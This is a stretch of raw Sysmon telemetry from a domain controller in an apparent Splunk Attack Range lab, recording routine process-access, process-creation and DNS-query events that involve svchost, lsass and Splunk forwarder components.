13:39:44.645{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:44.645{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:44.645{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8FA0-6005-FA00-00000000A301}3900C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:44.645{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8FA0-6005-FA00-00000000A301}3900C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:44.646{59A5CD1D-8FA0-6005-FA00-00000000A301}3900C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000004636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:43.597{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 10341000x80000000000000004635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:45.520{59A5CD1D-8FA1-6005-FB00-00000000A301}12441340C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:45.364{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8FA1-6005-FB00-00000000A301}1244C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:45.364{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8FA1-6005-FB00-00000000A301}1244C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:45.364{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8FA1-6005-FB00-00000000A301}1244C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:45.365{59A5CD1D-8FA1-6005-FB00-00000000A301}1244C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:46.005{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8FA2-6005-FC00-00000000A301}4428C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:46.005{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:46.005{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:46.005{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:46.005{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:46.005{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:46.005{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 